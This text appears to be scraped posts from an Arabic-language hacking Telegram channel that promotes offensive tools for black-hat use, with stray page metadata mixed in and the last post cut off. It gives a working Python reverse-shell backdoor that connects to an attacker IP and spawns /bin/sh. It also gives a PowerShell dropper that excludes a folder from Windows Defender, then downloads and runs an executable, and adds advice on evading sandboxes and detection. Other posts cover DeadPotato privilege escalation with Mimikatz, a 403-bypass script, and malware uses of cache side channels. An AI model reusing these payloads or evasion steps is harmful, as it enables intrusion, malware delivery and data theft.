دعم للذكاء الاصطناعي عشان يساعدك يفرق بين الروابط المهمة وغير المهمة أو حتى يحدد احتمالية تعرض الرابط لهجوم الأداة مبنية بلغة Go وده بيديها سرعة وأداء عاليين خصوصًا لما تتعامل مع ملفات ضخمة أو عمليات تحليل سريعة ولو عاوز تحسن أدائها أكتر ممكن تطور الأكواد بتاعتها عشان تقلل من الـ False Positives أو تضيف خصائص تحليل ديناميكية للروابط بعد استخراجها وده يخليها مش بس بتطلع روابط لكنها كمان بتحللها وتحدد نقاط الضعف فيها الأداة دي بالنسبة لأي بلاك هات هي أداة متعددة الاستخدامات وممكن تتطور وتتكامل مع أدوات تانية أو حتى تبني عليها مشاريع أكبر عشان تجمع بيانات أكتر وتستغلها بشكل أذكى سواء في هجمات منظمة أو اختبارات أمنية معقدة\n\n\nرابط المشروع على جيت هوب","datePublished":"2024-11-22T01:25:53Z","dateModified":"2024-11-22T01:25:53Z","author":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"publisher":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":315},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":5},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":9}]}}]}





الكود ده فيه ثغرة من نوع XSS واللي هي اختصار لـ Cross-Site Scripting والسبب في كده إن الكود بيعرض inputs اللي المستخدم بيكتبها في الـ input مباشرة على الصفحة باستخدام document.body.innerHTML ودي طريقة غير آمنة تماما لإنها بتسمح بحقن أكواد JavaScript ضارة وعرضها أو تنفيذها في سياق المتصفح الخاص بالمستخدم وبالتالي لو في حد ضار أو هاكر قدر يدخل كود JavaScript في حقل الـ input زي الكود ده هيتنفذ مباشرة على الصفحة وده معناه إن أي مستخدم يفتح الصفحة دي بعد كده هيتعرض للثغرة اللي ممكن الهاكر يستغلها في سرقة الكوكيز الخاصة بالمستخدم أو تنفيذ أكواد خبيثة تؤدي لسرقة الجلسات أو حتى حقن أكواد ضارة عشان تسرق بيانات تانية أكتر حساسية زي الـ Tokens اللي بتستخدم في الجلسات أو البيانات الشخصية المشكلة في النوع ده من الثغرات إنها بتسبب تهديد حقيقي لأمان التطبيق والمستخدمين وكمان بتعتبر من الثغرات اللي ممكن تستغل بسهولة كبيرة لو المطورين مش بياخدوا بالهم من كيفية التعامل مع المدخلات بطريقة آمنة الحلول الأساسية لتفادي النوع ده من الثغرات بتتمثل في استخدام طرق آمنة لعرض البيانات زي textContent أو التأكد من تطهير المدخلات عن طريق استخدام مكتبات متخصصة لتطهير المدخلات زي DOMPurify اللي بتنضف المدخلات من أي أكواد ضارة وتمنع تنفيذ أي أكواد JavaScript غير مرغوب فيها بالإضافة لإن المطور لازم يكون واعي لفكرة الـ Content Security Policy (CSP) واللي بيسمح للمطور يحدد مصادر الأكواد اللي ممكن تتنفذ على الصفحة ودي بتقلل بشكل كبير احتمالية تنفيذ أي ميليشيوس كودز
السكريبت اللي بنتكلم عنه هنا هو "DeadPotato" واللي بيعتبر واحد من الأدوات القوية في عالم الهجوم على أنظمة الويندوز تحديدا في سيناريوهات التصعيد للامتيازات أو الـ Privilege Escalation ودي واحدة من أخطر وأهم الخطوات في أي عملية هجوم ناجحة على أي نظام لأنه بمجرد ما المخترق يقدر يرفع مستوى صلاحياته على الجهاز بيبقى ليه سيطرة كاملة على النظام وبيقدر ينفذ أوامر خطيرة ويثبت برامج ضارة أو مالوير ويجمع معلومات حساسة والسكريبت ده مبني على فكرة استغلال ثغرات قديمة في أنظمة ويندوز زي ثغرة الـ RottenPotato أو JuicyPotato واللي بتسمح للمخترق إنه يستخدم صلاحيات الـ SYSTEM أو الـ Administrator على الجهاز المستهدف من خلال التلاعب ببعض البروتوكولات اللي بيستخدمها ويندوز للتواصل بين العمليات الداخلية في النظام زي الـ DCOM والـ RPC اللي هما Distributed Component Object Model وRemote Procedure Call على التوالي.
الـ DeadPotato بيسمح للمهاجم إنه ينفذ كود معين بصلاحيات عالية من غير ما يكون ليه وصول مباشر لصلاحيات الـ SYSTEM في الأول ودي نقطة مهمة جدا لأن معظم العمليات اللي بتحصل على النظام بتكون بصلاحيات محدودة يعني مش كل واحد يستخدم الكمبيوتر أو السيرفر عنده صلاحيات النظام بالكامل وده اللي بيخلي اختراق الأنظمة الحديثة أكتر تعقيدا وأصعب لكن باستخدام DeadPotato بيتمكن المهاجم إنه يستغل حاجة اسمها NTLM Relay Attack علشان يوصل للـ SYSTEM privileges على الجهاز المصاب من غير ما يكون عنده أصلا الوصول المباشر ليها.
بخصوص تصحيح المعلومة وتنسيقها بشكل علمي أكتر خلينا نقول إن استغلال الـ NTLM Relay في DeadPotato بيتم من خلال إرسال طلبات تصديق مزورة للـ NTLM protocol داخل النظام ده بيتم عن طريق خداع الخدمة اللي بتمشي الطلبات دي زي خدمة COM أو DCOM اللي هي أساسا بتمشي طلبات بينها وبين الـ LSASS اللي هي Local Security Authority Subsystem Service المسؤولة عن إدارة سياسات الأمان وعمليات التوثيق في ويندوز واللي بيحصل هنا إن السكريبت بيعمل حاجة اسمها "Token Impersonation" واللي بتسمح للمهاجم بأنه يقلد صلاحيات المستخدم الموثق بحيث إنه يقدر ينفذ أي أمر أو ينزل أي برنامج ضار بصلاحيات أعلى بكثير من اللي كان يقدر ينفذها لوحده في الحالة الطبيعية.
لو انت بتهدف إنك تدمج DeadPotato مع مالوير معين علشان تنفذ هجوم شامل وقوي على أنظمة ويندوز لازم تفكر بطريقة البلاك هات اللي هي المخترقين اللي بيستخدموا مهاراتهم لشن هجمات ضارة وإلحاق أذى حقيقي أو سرقة بيانات ومعلومات مالية وحساسة لما تدمر الحماية على النظام باستخدام DeadPotato هتقدر بعد كده تدخل المالوير بتاعك بشكل سلس وبدون ما يتم اكتشافه بسهولة خصوصا لو عملت باندنغ مع سكريبت تاني زي Mimikatz اللي بيتيح لك استخراج التوكينز وكلمات المرور من الذاكرة واللي بيسمح لك أنك تكمل الهجوم بتاعك بشكل أسرع وأنجح وتسيطر على الشبكة كلها.
قوة DeadPotato بتيجي من إنه بيستغل البروتوكولات اللي هي أصلا جزء أساسي من نظام التشغيل وماحدش يقدر يقفلها بسهولة لأن لو قفلتها هتعطل حاجات تانية في السيستم يعني المهاجم بيلعب على حتة حساسة جدا في النظام علشان كده الهجوم بيبقى خطير وصعب الحماية ضده وفي نفس الوقت بيسهل دمج الهجمات دي في مالوير لأنك بتضمن إن مالويرك هيشتغل بصلاحيات عالية وبدون ما يحتاج إنه يكسر حماية كبيرة في البداية.
رابط المشروع على جيت هوب
مشروع Indetectables Toolkit اللي موجود على GitHub هو مكتبة مفتوحة المصدر بتضم مجموعة أدوات وتقنيات متقدمة مخصصة لتحليل البرمجيات الخبيثة والهندسة العكسية وكمان تطوير أو كسر حماية البرمجيات وهو مشروع بيستهدف بشكل أساسي المهتمين بالأمن السيبراني سواء محترفين أو هاكرز بس لو بنتكلم في سياق البلاك هات فهو يعتبر كنز لأي شخص عايز يعزز مهاراته في تطوير الأدوات أو اختراق الأنظمة لأن المشروع بيوفر بيئة جاهزة للتجربة والتطوير واللي يميزه إنه بيشتغل بشكل عام على ملفات التنفيذ سواء EXE أو DLL وبيساعد على تحليل الكود الخاص بيها وفهم العمليات اللي بتحصل داخل البرامج وخاصة العمليات اللي بتتعامل مع الذاكرة زي Buffer Management أو عمليات التحميل الديناميكي للملفات
البلاك هات ممكن يستخدم المشروع ده بشكل مباشر في تحليل الثغرات داخل البرمجيات أو الأنظمة المستهدفة لأن الأدوات دي بتوفر وسائل لفهم كيفية تعامل التطبيقات مع المدخلات والبيانات وبكده يقدر الهكر يكتشف أخطاء في الأكواد زي Buffer Overflow أو Heap Exploitation اللي بتظهر لما البرنامج يستقبل بيانات أكتر من حجم الذاكرة المخصص ليها وده بيتيح تنفيذ أكواد ضارة جوه البرنامج المستهدف بالإضافة إلى إن الأدوات دي بتشتغل على مستوى متقدم من الهندسة العكسية وبتساعد الهكر في فك التشفير أو الحماية اللي بتكون موجودة على البرامج زي آليات Licensing Systems أو DRM واللي بتستخدم لحماية البرامج من النسخ أو التعديل
لو الهكر عنده خلفية برمجية قوية ممكن يطوّر الأدوات دي عشان تبقى أكتر تعقيداً وفعالية زي إنه يضيف تقنيات لتعتيم الكود Obfuscation واللي بتساعد على إخفاء البرمجيات الخبيثة من برامج الحماية أو يدمجها مع مكتبات زي Radare2 أو Capstone اللي بتقدم إمكانيات تحليل متقدم للأكواد الثنائية وممكن كمان يضيف إمكانيات لتحليل الشبكات مع البرامج دي باستخدام مكتبات زي Scapy لتحليل حزم البيانات أو إدخال وظائف لتوليد Payloads متطورة تقدر تخترق الأنظمة الحديثة
من الأفكار اللي ممكن الهكر يدمجها مع المشروع هي إنه يضيف تقنيات استغلال Automated Exploitation عشان يخلي الأدوات بتشتغل تلقائياً على اكتشاف واستغلال الثغرات وممكن كمان يدمج المشروع مع أدوات متطورة زي IDA Pro أو Ghidra لتحليل البرمجيات بشكل أعمق وفك الكود المصدري بشكل أوضح واللي هيتيح للهكر مش بس فهم الكود لكن كمان إعادة بنائه أو تعديله بما يناسب احتياجاته
في مجال كسر البرامج الأدوات دي بتساعد الهكر في فك حماية البرامج من خلال تحليل الـ Binary Code وإيجاد النقاط اللي فيها عمليات تحقق التراخيص ودي ممكن يتم تجاوزها بسهولة باستخدام تقنيات Patch Based Exploitation اللي بتعدل على الكود الموجود جوه الملف التنفيذي أو إدخال تقنيات مثل Code Injection لإضافة تعليمات برمجية جديدة تخدم الغرض المطلوب وفي مجال اكتشاف الثغرات الأدوات دي ممكن تستخدم لفحص الأماكن اللي بيتم فيها تخصيص الذاكرة جوه التطبيقات وتحليل الـ Stack Frames بشكل يدوي أو تلقائي عشان يكتشف الهكر الأماكن اللي ممكن يحصل فيها تجاوز للذاكرة أو Access Violations ودي أكتر الأماكن اللي بيتم استغلالها في الثغرات الحديثة
الهكر اللي عايز يطور الأدوات دي ممكن كمان يستغل الذكاء الاصطناعي في تحليل الأكواد دي بشكل أسرع ويدمج خوارزميات Machine Learning لتحديد الأماكن اللي ممكن تكون عرضة للاستغلال بشكل تلقائي وكمان ممكن يطور واجهة رسومية للمشروع عشان يبقى سهل الاستخدام حتى للي معندوش خبرة كبيرة في التعامل مع الأدوات التقليدية وأخيراً المشروع يعتبر منصة مفتوحة لأي شخص عايز يتعلم أو يطور في مجال الأمن السيبراني والهندسة العكسية بشرط يكون عنده أساسيات برمجية قوية ومهارات تحليلية
رابط المشروع على جيت هوب
#Exclusive 🔥
#TrainSec | Malware Analyst Professional - Level 1 (2023)
Info : https://training.trainsec.net/malware-analyst-professional-level-1
الدورة دي اللي موجودة على موقع Training TrainSec اسمها Malware Analyst Professional Level 1 ودي دورة متخصصة في تحليل البرمجيات الخبيثة يعني بتعلمك ازاي تكتشف وتحلل المالوير بشكل احترافي ودي حاجة مهمة لأي هكر عايز يطور من نفسه ويزود مهاراته الأمنية الدورة دي بتبدأ معاك من الأساسيات وبتشرحلك بشكل عملي إزاي تتعامل مع أنواع مختلفة من المالوير زي الفيروسات والدود وبرامج التجسس والتروجانات وده مش بس بيكون نظري لكن عملي كمان هتتعلم ازاي تفك شفرات المالوير وتفهم طريقة عمله وده عن طريق استخدام أدوات متخصصة زي IDA Pro و OllyDbg و Wireshark ودي أدوات قوية جدا في تحليل المالوير وفهم طريقة عمله كمان هتتعلم إزاي تكتب تقارير تحليلية مفصلة عن المالوير وده مهم عشان تقدر توصل المعلومات بطريقة مفهومة وواضحة لفريق الأمن السيبراني أو لأي جهة مهتمة بالتحليل اللي عملته التدريب ده كمان بيكون فيه أمثلة حقيقية وحالات عملية بتخليك تواجه التحديات اللي ممكن تقابلك في الواقع وتعرف إزاي تتعامل معاها بشكل احترافي ومش بس كده ده كمان بيخليك تكتسب خبرة عملية ومهارات تحليلية عالية بتخليك تقدر تكتشف الثغرات ونقاط الضعف اللي المالوير بيستغلها وتقدر تحط استراتيجيات لحماية الأنظمة والشبكات منها وكل ده بيساعدك إنك تكون محلل مالوير محترف وتقدر تتعامل مع أي تهديد أمني بثقة وكفاءة ومن الفوائد الكبيرة اللي هتحصل عليها من الدورة دي إنك هتقدر تطور من مهاراتك الشخصية وتزود من فرصك المهنية لأن الشركات النهارده بقت بتدور على الناس اللي عندها خبرة في تحليل المالوير وحماية الأنظمة من التهديدات الأمنية وكمان ده بيفتح لك أبواب جديدة في مجالات زي التحقيقات الجنائية الرقمية والأمن السيبراني بشكل عام في النهاية التدريب ده مش مجرد دورة تعليمية لكن هو استثمار في نفسك وفي مستقبلك المهني وبيساعدك إنك تكون واحد من الخبراء في مجال تحليل المالوير وتكون عندك القدرة على حماية الأنظمة والشبكات من التهديدات المتطورة اللي بتواجهها النهارده
الكود الخاص بالباك دور meterpreter_reverse_tcp المكتوب بلغة البايثون بيستخدم لتحكم كامل في الجهاز المصاب عن بعد عبر اتصال عكسي ببروتوكول TCP. هنشرح الكود كامل خطوة بخطوة يا شباب تابعوا الشرح معايا :
import socket
import subprocess
import os
import time
في البداية الكود بيستورد مكتبات البايثون الأساسية:
- socket: عشان نقدر نتصل بالشبكة وننشيء اتصالات.
- subprocess: عشان نقدر ننفذ أوامر النظام.
- os: عشان نقدر نتعامل مع نظام التشغيل.
- time: عشان نقدر نستخدم دوال الوقت والتأخير.
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.3", 4444))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])
دالة connect بتعمل الآتي:
- بتنشئ socket باستخدام socket.AF_INET اللي بيحدد استخدام IPv4 وsocket.SOCK_STREAM اللي بيحدد استخدام بروتوكول TCP.
- بتبدأ الاتصال بـ handler اللي شغال على جهاز المهاجم على IP 192.168.1.3 وبورت 4444.
- بعد ما الاتصال يتم، بتستخدم os.dup2 عشان توجه الإدخال (stdin)، الإخراج (stdout)، والخطأ القياسي (stderr) للـsocket ده معناه إن أي حاجة تكتب في الشل (shell) هتتبعت لجهاز المهاجم والعكس.
- في النهاية بتشغل شل /bin/sh عشان تتيح للمهاجم تنفيذ الأوامر على الجهاز المصاب.
while True:
try:
connect()
except:
time.sleep(5)
continue
في الجزء ده الكود بيدخل في حلقة لا نهائية while True، وبيحاول ينفذ دالة connect لو حصل أي خطأ أثناء الاتصال زي إن السيرفر مش شغال أو إن الاتصال تقطع، الكود بيستنى 5 ثواني باستخدام time.sleep(5) قبل ما يحاول الاتصال تاني ده بيضمن إن الباك دور يفضل يحاول الاتصال لحد ما ينجح.
ده شرح كامل للكود. الكود بيتم حقنه في الجهاز المستهدف عن طريق استغلال معين زي ثغرة في النظام أو في برنامج معين بعد ما الكود يتحقن الجهاز المصاب بيبدأ الاتصال بجهاز المهاجم اللي شغال عليه الميتاسبلويت واللي بيكون مستني الاتصال على الـIP والبورت المحددين في الكود بمجرد ما الاتصال يتم، المهاجم بيحصل على جلسة تحكم كاملة بالجهاز المصاب وبيقدر ينفذ أوامر النظام، يرفع ملفات، ينزل ملفات، يشغل برمجيات خبيثة، يجمع معلومات عن الجهاز، أو يتحكم في العمليات اللي شغالة عليه.
باختصار الباك دور meterpreter_reverse_tcp هو حمولة بتستخدم للتحكم في الأنظمة المصابة عن بعد عبر اتصال TCP عكسي بتتيح للمهاجم تنفيذ أوامر وجمع معلومات والتحكم الكامل في الجهاز المصاب الكود مكتوب بلغة البايثون وبيتم حقنه في النظام المستهدف عن طريق استغلال معين عشان يعمل جلسة تحكم meterpreterالباك دور اللي بنتكلم عنه هو meterpreter_reverse_tcp اللي موجود في الميتاسبلويت هو عبارة عن حمولة بيتم حقنها في النظام المستهدف عن طريق استغلال معين وبتتيح للمهاجم التحكم الكامل في الجهاز المصاب من خلال اتصال يتم عكسه من الجهاز المصاب لجهاز المهاجم عبر بروتوكول الـTCP. يعني الجهاز المصاب هو اللي بيبعت الاتصال لجهاز المهاجم عشان يعمل جلسة تحكم meterpreter بيشتغل زي الشل (shell) بس بشكل متطور وبيوفر أوامر ووظائف كتير للمهاجم زي رفع الملفات تنزيل الملفات تنفيذ الأوامر تشغيل البرمجيات الخبيثة جمع المعلومات من النظام المصاب التحكم في العمليات اللي شغالة على الجهاز وغيرهم من الوظائف
الكود الخاص بالـmeterpreter_reverse_tcp مكتوب بلغة البايثون عشان يقدر يشتغل على الأنظمة اللي بتدعم البايثون وعشان كمان يكون سهل تعديله وتحليله. الكود بيتضمن دوال مختلفة لتنفيذ الأوامر وجمع المعلومات والاتصال بالـhandler اللي بيشتغل على جهاز المهاجم. الكود بيبدأ بتحميل المكتبات اللازمة زي sys وsocket وstruct وغيرهم بعد كده بيتم تعريف الدوال الرئيسية زي دالة الاتصال اللي بتعمل socket وبتبدأ الاتصال بالـhandler. بعد كده بيتم تعريف دوال تانية لتنفيذ الأوامر وجمع البيانات زي دالة execute_command اللي بتاخد الأمر وتنفذه على الجهاز المصاب وترجع النتيجة للـhandler.
من الأوامر المهمة في meterpreter: أمر sysinfo اللي بيجمع معلومات عن النظام زي اسم الجهاز نظام التشغيل المعالج الرام وغيرها من المعلومات وأمر ps اللي بيعرض العمليات اللي شغالة على الجهاز وأمر migrate اللي بينقل الـmeterpreter من عملية للتانية عشان يفضل شغال لو العملية الأصلية اتقفلت وأمر upload وdownload لرفع وتنزيل الملفات وأمر webcam_snap لتشغيل الكاميرا وأخذ صورة وأمر record_mic لتسجيل الصوت من الميكروفون. دول بعض الأمثلة على الأوامر اللي بيقدر المهاجم ينفذها عن طريق meterpreter
طريقة البناء بتبدأ بكتابة الكود في ملف بايثون وتحديد كل الأوامر والدوال المطلوبة بعد كده بيتم إضافة الكود ده كحمولة (payload) في الميتاسبلويت وتحديد استغلال معين يستخدم الحمولة دي يعني بيتم تحديد ثغرة معينة أو طريقة للوصول للنظام المستهدف وحقن الكود فيه بعد نجاح الحقن بيتم تنفيذ الكود وبدء الاتصال بجهاز المهاجم لعمل جلسة تحكم meterpreter.
باختصار meterpreter_reverse_tcp هو حمولة بتستخدم للتحكم في الأنظمة المصابة عن بعد عبر اتصال TCP عكسي بتتيح للمهاجم تنفيذ أوامر وجمع معلومات والتحكم الكامل في الجهاز المصاب الكود مكتوب بلغة البايثون وبيتم حقنه في النظام المستهدف عن طريق استغلال معين عشان يعمل جلسة تحكم meterpreter.
انشاء باكدور بلغة البايثون و الاتصال العكسي به يكون عبر الميتاسيلويت
الباكدور هذا لجميع الانظمة 🔴
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/python/meterpreter/reverse_tcp.md
4-ZERO-3 : Is A Tool Used To Bypass 403/401 By Methods 🍽, Script will print cURL PAYLOAD if possible bypass found😈
Link :🔗 https://github.com/Dheerajmadhukar/4-ZERO-3.git
Setup😈:
git clone https://github.com/Dheerajmadhukar/4-ZERO-3.git
cd 4-ZERO-3
chmod +x 403-bypass.sh
./403-bypass.sh -h
Usage😀:
./403-bypass.sh -u https://google.com/.htaccess —exploitAdd-MpPreference -ExclusionPath $env:USERPROFILE\Downloads
$url = 'Your URL'
$outputFile = [System.IO.Path]::Combine($env:USERPROFILE, 'Downloads', 'NAME.exe')
# Wait until the exclusion is confirmed (just a safeguard, usually it happens instantly)
Start-Sleep -Milliseconds 100
# Download the file
Invoke-WebRequest -Uri $url -OutFile $outputFile
# Run the downloaded file after the download is complete
Start-Process -FilePath $outputFile
الكود المكتوب هنا هو مثال لتقنية بيتم استخدامها بشكل متكرر في عالم المالوير والاختراق علشان يتخطى بيها المخترقين برامج الحماية الموجودة على أجهزة الضحايا باستخدام الـ PowerShell اللي هو جزء أساسي من أنظمة ويندوز الكود ده بيبدأ باستخدام أمر Add-MpPreference واللي وظيفته إنه يضيف مسار معين لقائمة الاستثناءات في برنامج الحماية Windows Defender بمعنى إنه بيقول للبرنامج إنه المسار ده آمن وما فيش داعي لفحصه الخطوة دي بتتطلب صلاحيات مسؤول على الجهاز وبمجرد نجاحها أي ملف أو عملية داخل المسار المستثنى مش هيتفحصه برنامج الحماية وده ثغرة خطيرة المخترق بيستغلها علشان يخفي المالوير بتاعه وبعد كده السطر التاني بيمثل تعريف لعنوان URL اللي بيحتوي على ملف المالوير اللي المفترض يتم تحميله والملف ده بيتم تنزيله وتخزينه في مجلد التنزيلات الخاص بالمستخدم عن طريق تحديد مسار الملف باستخدام [System.IO.Path] اللي هي دالة بتجمع بين الـ USERPROFILE اللي هي المسار الرئيسي للمستخدم في الويندوز وبين اسم الملف اللي هو NAME.exe وده بيخلي العملية تبدو كأنها شغالة بشكل طبيعي في النظام السطر اللي بعده بيضيف مهلة قصيرة باستخدام Start-Sleep علشان يتأكد إن الاستثناء تم تطبيقه بالكامل قبل تنفيذ أي عملية أخرى بعد كده Invoke-WebRequest بيقوم بتحميل الملف من الـ URL المحدد وبيحفظه في المسار اللي تم تحديده مسبقاً وبعد انتهاء عملية التحميل Start-Process بيبدأ في تنفيذ الملف اللي تم تنزيله وده بيشغل المالوير مباشرة على الجهاز الهدف من غير ما برامج الحماية تقدر تتعرف عليه أو تعترضه
للمخترقين أو مطوري المالوير الكود ده بيتم استخدامه بطرق مختلفة وذكية لزيادة فرصة نجاح العملية أولاً المالوير بيكون مشفر علشان ما يتمش اكتشافه بسهولة ويفضل استخدام تشفير متعدد الطبقات علشان يزيد من صعوبة تحليله من قبل محللي الحماية ثانياً الـ URL المستخدم لتحميل المالوير بيكون في العادة مختصر أو مخفي باستخدام تقنيات زي الـ Fast Flux علشان يصعب تتبعه ثالثاً عملية تنفيذ المالوير بتتم بعد التأكد من إن النظام ما فيهش آليات مراقبة إضافية زي برامج Sandbox أو برامج الحماية الإضافية زي Kaspersky أو Norton وبالنسبة للباحثين الأمنيين اللي بيحاولوا فهم وتحليل الأكواد زي دي النصيحة الأهم هي استخدام بيئات افتراضية مؤمنة بالكامل زي VirtualBox أو VMware مع برامج مراقبة زي Sysmon علشان تقدر تتبع كل الخطوات اللي بيقوم بيها المالوير وكشف الثغرات اللي بيستغلها علشان تقدر توقفه
التقنية المستخدمة في الكود ده بتندرج تحت مفهوم "Living Off The Land Binaries and Scripts" أو اللي بتختصر بـ LOLBAS التقنية دي معناها استخدام أدوات أو أوامر موجودة أصلاً في النظام (زي PowerShell في الحالة دي) لتنفيذ هجمات أو تحميل مالوير، بدل ما يعتمد المخترق على برامج أو أدوات خارجية ممكن يتم اكتشافها بسهولة من برامج الحماية
ميزة LOLBAS إنها بتستغل أدوات موثوقة وموقّع عليها من الشركة المصنعة للنظام (مايكروسوفت في المثال ده) وبالتالي بتصعّب على برامج الحماية إنها تميز النشاط الضار لأن الأدوات دي بتُستخدم في الأساس لأغراض مشروعةالكتاب اللي انا حملته "PowerShell for Penetration Testing" بيشرح بالتفصيل إزاي تستخدم PowerShell في اختبارات الاختراق وبيغطي مواضيع كتير زي استغلال الثغرات والتحكم في الأنظمة عن بُعد وبيوضح إزاي PowerShell ممكن يبقى أداة قوية لأي هكر أو مطور برامج ضارة (Malware Developer) أو مطور استغلالات (Exploit Developer) الكتاب بيعلمك إزاي تجمع معلومات عن الأنظمة والشبكات عن طريق استغلال بروتوكولات زي SNMP و SMTP و SMB وده بيساعدك في تحديد الثغرات الأمنية اللي ممكن تستغلها عشان تخترق الأنظمة الكتاب كمان بيشرح إزاي تستخدم PowerShell في إعداد وتنفيذ أوامر عن بُعد وده بيشمل التحكم في الأجهزة ونسخ الملفات عن بُعد وإنشاء حسابات جديدة وده كله بيساعدك في السيطرة على الأنظمة والشبكات بشكل كامل حاجة تانية مهمة في الكتاب هي شرح كيفية تجاوز Windows Defender وقواعد ASR باستخدام تقنيات متقدمة في PowerShell وده بيساعدك في تطوير برامج ضارة ما تتكشفش بسهولة وتقدر تعدي من الأنظمة الأمنية الكتاب كمان بيتكلم عن التعامل مع بروتوكولات البريد الإلكتروني زي SMTP وبيعلمك إزاي تستغلهم في الهجمات زي التحقق من عناوين البريد الإلكتروني وفتح الروابط المرسلة وكمان إزاي تتجنب اكتشاف الهجمات دي من الأنظمة الأمنية الحاجات دي كلها بتخليك قادر تطور مهاراتك في اختبارات الاختراق وتطوير البرامج الضارة والاستغلالات بشكل كبير وتقدر تستخدم التقنيات اللي في الكتاب ده عشان تكتسب خبرة عملية في المجال وتبقى هكر محترف الكتاب بيعلمك مهارات كتير زي الأتمتة (Automation) والتحكم في الأنظمة والشبكات وجمع المعلومات وتحليلها وتجاوز الأنظمة الأمنية وده بيخليك مستعد لأي تحدي في مجال اختبار الاختراق وتطوير البرامج الضارة والاستغلالات عشان كده تعلم PowerShell مهم جداً لأي هكر لأنه بيساعدك في القيام بمهام كتير بسهولة وفعالية وبيخليك قادر تتحكم في الأنظمة والشبكات وتستغل الثغرات الأمنية بكل احترافية الكتاب ده ممكن يطور أي هكر ويخليه قادر يحقق أهدافه بسهولة وبأقل مجهود
الكاش ميموري ببساطة هي نوع من أنواع الذاكرة اللي بتشتغل بسرعة عالية جدًا وبتكون موجودة بين البروسيسور والرام والهدف الأساسي منها إنها تقلل الوقت اللي البروسيسور بيحتاجه عشان يجيب البيانات اللي هيشتغل عليها البروسيسور بيحتاج بيانات بشكل مستمر عشان يعالجها لكن مش دايمًا البيانات دي بتكون قريبة منه لو اعتمد البروسيسور على إنه يجيب البيانات كلها من الرام بس ده هيأخره جدًا لأن الرام أبطأ من الكاش بكتير عشان كده الكاش بتتدخل هنا كوسيط سريع الكاش بتتخزن فيها البيانات اللي البروسيسور بيحتاجها بشكل متكرر أو متوقع قريبًا وبالتالي بدل ما يرجع للرام ويستنى الكاش بتوفرها ليه في وقت أقل وده بيعني إن أداء البروسيسور بيزيد بشكل كبير جدًا
في الكاش فيه 3 مستويات أساسية المستوى الأول اللي هو L1 وده بيكون الأصغر في الحجم لكنه الأسرع لأنه قريب جدًا من البروسيسور والمستوى الثاني L2 اللي بيكون أكبر شوية وأبطأ شوية وأخيرًا المستوى الثالث L3 اللي بيكون الأكبر في الحجم لكنه الأبطأ مقارنة بالمستويين التانيين بس برضه أسرع من الرام كتير البروسيسور لما يحتاج بيانات بيبدأ يدور عليها في الكاش من L1 الأول لو مش موجودة يدور في L2 وهكذا ولو ملقاش يرجع للرام مباشرة
في سياق استغلال الكاش ميموري للهكرز الكاش ممكن تبقى أداة مهمة جدًا لو حد عايز يطور مالوير متقدم أو يعمل استغلال معين أولًا فيه حاجة اسمها "Cache Timing Attacks" اللي بتعتمد على قياس الوقت اللي البروسيسور بياخده عشان يجيب بيانات معينة الهكر ممكن يستغل دي عشان يعرف إذا كانت بيانات معينة موجودة في الكاش ولا لأ وبالتالي يقدر يستنتج معلومات حساسة زي كلمات السر أو المفاتيح التشفيرية عن طريق تحليل الأنماط الزمنية دي ده بيحصل لأن الكاش بتميل تحتفظ بالبيانات اللي بتستخدمها البرامج بشكل متكرر فالهكر لو عرف يتحكم في البرنامج أو يعرف يتتبع أداؤه ممكن يستخدم الكاش كوسيلة للتجسس عليه
تطوير المالوير باستخدام الكاش ميموري ممكن يتم بطرق زي إدماج تقنيات استغلال الكاش في المالوير بحيث إنه يقدر يقرأ أو يكتب بيانات بسرعة أكبر أو حتى إنه يقدر يراقب تطبيقات تانية شغالة على نفس النظام ده مفيد جدًا خصوصًا في الهجمات على الأنظمة المشتركة زي الخوادم أو الأجهزة اللي بتشغل تطبيقات مختلفة على نفس الجهاز المالوير اللي بيستغل الكاش ممكن يكون قادر على استخدام القنوات الجانبية اللي هي Side-Channel Attacks عشان يسرّب بيانات حساسة من الأنظمة المستهدفة الهكر ممكن كمان يستخدم الكاش عشان يبطّئ نظام معين أو يخليه أقل كفاءة لو استخدم تقنيات زي Cache Poisoning اللي بتعتمد على إنها تملأ الكاش ببيانات غير مفيدة وبالتالي تمنع البرامج العادية من استخدام الكاش بشكل فعال
بالإضافة لكده الكاش ليها دور في تسريع بعض العمليات اللي ممكن الهكر يستغلها أثناء تطوير المالوير مثلاً المالوير اللي بيعمل على التشفير أو فك التشفير ممكن يستخدم الكاش لتخزين البيانات الوسيطة اللي بيحتاجها بشكل مستمر ده هيخليه أسرع وأصعب في الاكتشاف لأن الأداء العالي بيقلل من فرص الملاحظة من أدوات الحماية بشكل كبير لو الهكر فهم طريقة عمل الكاش كويس وعرف يديرها بشكل صحيح هيكون عنده أداة قوية جدًا سواء للهجوم أو حتى للدفاع
مشروع DRMBinViaOrdinalImports بيعتمد على تكنيك متطور في برمجة المالويرز وهو استغلال Ordinal Imports عشان يزود مستوى التخفي ضد أنظمة الحماية وتحليل البرمجيات. العادي إن المالوير لما بيحتاج يستدعي دوال من مكتبات النظام، بيستخدم أسماء واضحة زي
